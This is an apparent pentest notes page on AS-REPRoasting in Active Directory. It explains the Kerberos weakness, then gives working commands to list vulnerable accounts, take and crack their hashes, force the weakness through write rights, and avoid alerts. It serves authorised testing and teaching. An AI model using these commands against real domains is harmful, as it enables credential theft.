AS-REPRoasting

AS-REPRoasting is an attack on the initial Kerberos authentication step and it is usually performed after obtaining a list of valid domain users.

Preauthentication is a security feature in Kerberos where the client must prove knowledge of their password before the KDC issues a TGT. This is done by encrypting a timestamp with a key derived from the user’s password and sending it to the KDC. If the KDC can decrypt and validate the timestamp, it confirms the user knows their password — protecting against offline brute-force attacks.

If an account has the Do not require Kerberos pre-authentication setting enabled then everyone can request from the DC to authenticate as that account and receive an AS-REP. The AS-REP contains the TGT which is encypted with the account's password hash which can be potentially cracked.

Figure 1: The Kerberos authentication process (image taken from here).

Tools

Linux

Enumerate ASREPRoastable accounts using Impacket or Kerbrute:

# Impacket's GetNPUsers script
impacket-GetNPUsers <domain>/<user> -dc-ip <dc-ip>

# Kerbrute
kerbrute userenum -d <domain> --dc <dc-ip> /opt/jsmith.txt

Execute the attack using Impacket or NetExec:

# Impacket's GetNPUsers script targeting a list of users
impacket-GetNPUsers <domain>/ -dc-ip <dc-ip> -no-pass -usersfile users.txt

# Impacket's GetNPUsers script targeting a single user
impacket-GetNPUsers <domain>/<targetUser> -dc-ip <dc-ip> -no-pass

# NetExec
nxc ldap <dc-ip> -u users.txt -p '' --asreproast asreproast.lst

For an example of ASREPRoasting using nxc see Sauna.

Windows

Enumerate ASREPRoastable accounts using PowerView or the ActiveDirectory module:

# PowerView
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

# AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Execute the attack using Rubeus:

OPSEC: Try to attack a single user at a time as this is not seen as an anomaly and won't trigger alerts.

# ASREPRoast all susceptible accounts
.\Rubeus.exe asreproast /nowrap /format:hashcat /outfile:<fileName>

# ASREPRoast a single account
.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat /outfile:<fileName>

The obtained hashes can be cracked using Hashcat or JtR:

# Hashcat
hashcat -m 18200 asreproast.lst /usr/share/wordlists/rockyou

# John
john --format=krb5asrep --wordlist=rockyou.txt --fork=4 asreproast.lst

Targeted AS-REPRoast

If we can't find any vulnerable users, but we have GenericWrite or GenericAll on a user object, we can modify that user's UserAccountControl to disable preauthentication and then perform the ASREP roast attack. Don't forget to reset the UserAccountControl after extraction!

Windows

Force disable Kerberos PreAuth using PowerView:

Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} -Verbose

Request encrypted AS-REP using Rubeus:

.\Rubeus.exe asreproast /user:<user> /outfile:<fileName> /nowrap /format:hashcat

Resources

• Some amazing demonstrations of AS-REPRoasting (video, video)

• What impacket-GetNPUsers does behind the scenes (video)